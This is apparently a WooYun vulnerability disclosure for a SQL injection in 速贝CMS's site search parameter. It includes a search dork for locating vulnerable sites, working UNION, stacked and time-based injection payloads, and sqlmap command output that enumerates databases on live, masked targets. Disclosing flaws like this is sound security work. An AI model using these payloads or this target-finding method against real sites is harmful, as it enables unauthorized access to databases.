乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-06: 厂商已经主动忽略漏洞,细节向公众公开
如题。
搜索引擎关键词:Power by:速贝CMS
搜索处: App_Site/SiteSearch.aspx?Title=
随机提取部分案例做证明:
http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123
单引号直接报错 直接丢sqlmap跑
[root@Hacker~]# Sqlmap -u http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 17:07:45[17:07:45] [INFO] resuming back-end DBMS 'microsoft sql server'[17:07:45] [INFO] testing connection to the target url[17:07:45] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the testssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: Title Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: Title=123' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(112)+CHAR(119)+CHAR(104)+CHAR(58)+CHAR(86)+CHAR(67)+CHAR(99)+CHAR(71)+CHAR(99)+CHAR(83)+CHAR(111)+CHAR(70)+CHAR(79)+CHAR(84)+CHAR(58)+CHAR(111)+CHAR(119)+CHAR(117)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Title=123'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Title=123' WAITFOR DELAY '0:0:5'-----[17:07:45] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[17:07:45] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 1 times[17:07:45] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[17:07:45] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\SQLMAP~1\Bin\output\**.**.**.**'[*] shutting down at 17:07:45[root@Hacker~]# Sqlmap -u http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 17:07:49[17:07:50] [INFO] resuming back-end DBMS 'microsoft sql server'[17:07:50] [INFO] testing connection to the target url[17:07:51] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the testssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: Title Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: Title=123' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(112)+CHAR(119)+CHAR(104)+CHAR(58)+CHAR(86)+CHAR(67)+CHAR(99)+CHAR(71)+CHAR(99)+CHAR(83)+CHAR(111)+CHAR(70)+CHAR(79)+CHAR(84)+CHAR(58)+CHAR(111)+CHAR(119)+CHAR(117)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Title=123'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Title=123' WAITFOR DELAY '0:0:5'-----[17:07:51] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[17:07:51] [INFO] fetching database names[17:07:52] [INFO] the SQL query used returns 104 entries[17:07:52] [INFO] retrieved: "a0116101639"[17:07:53] [INFO] retrieved: "a0221164301"[17:07:53] [INFO] retrieved: "a0221164726"[17:07:53] [INFO] retrieved: "a0221164926"[17:07:54] [INFO] retrieved: "a0221165125"[17:07:54] [INFO] retrieved: "a0221170034"[17:07:55] [INFO] retrieved: "a0221170156"[17:07:55] [INFO] retrieved: "a0221170356"[17:07:55] [INFO] retrieved: "a0221172840"[17:07:56] [INFO] retrieved: "a0221173009"[17:07:56] [INFO] retrieved: "a0221173228"[17:07:56] [INFO] retrieved: "a0307095415"[17:07:57] [INFO] retrieved: "a0307095531"[17:07:57] [INFO] retrieved: "a0307095640"[17:07:57] [INFO] retrieved: "a0307095811"[17:07:58] [INFO] retrieved: "a0307095936"[17:07:58] [INFO] retrieved: "a0307100100"[17:07:59] [INFO] retrieved: "a0307100221"
由于库太多就没继续跑
过滤
未能联系到厂商或者厂商积极拒绝